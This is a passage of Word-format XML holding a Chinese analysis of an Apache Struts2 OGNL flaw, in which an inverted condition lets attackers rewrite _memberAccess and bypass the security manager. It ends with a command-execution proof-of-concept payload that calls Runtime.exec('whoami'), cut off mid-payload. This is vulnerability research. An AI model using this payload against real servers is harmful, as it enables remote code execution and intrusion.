          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代表权限检查通过，否则返回</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，也就是安全检查</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>失败，但是这里的条件进行判断时把条件给写反了</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>ognl.ObjectPropertyAccessor.setPossibleProperty(Map, Object, String, Object)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="8693"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</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2</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3</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4</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>当条件不满足时返回</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>，一取反就成</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="999999"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>条件满足，接着就会调用相关函数进行赋值操作</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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> (!OgnlRuntime.setMethodValue(ognlContext, target, name, value, </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>))</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 xml:space="preserve">     {</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 xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">result = OgnlRuntime.setFieldValue(ognlContext, target, name, value) ? </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> : OgnlRuntime.NotFound;</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">     }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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所以说上述代码才是实现修改</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_memberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>成员变量属性的决定性因素，所以即使做了权限检查，调用了相关判断函数，但是最终应为一个判断条件二前功尽弃，实在是不应该。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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就是因为这个关键条件的判断的问题，导致了我们可以修改</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_memberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的任意属性哪怕是私有的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="312" w:line="240" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>过安全管理器后，我们要想实现执行任意代码，只需要</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allowStaticMethodAccess=true(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行静态方法</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>excludedPackageNamePatterns=</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>空集合</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以调用相关包</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>excludedClasses=</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>空集合</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以调用任何类</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，满足这三个条件就可以执行任意代码了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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执行命令的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="29"/>
        <w:gridCol w:w="8759"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#_memberAccess.allowPrivateAccess=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>,#_memberAccess.allowStaticMethodAccess=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> java.util.Scanner(#a.exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>'whoami'</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
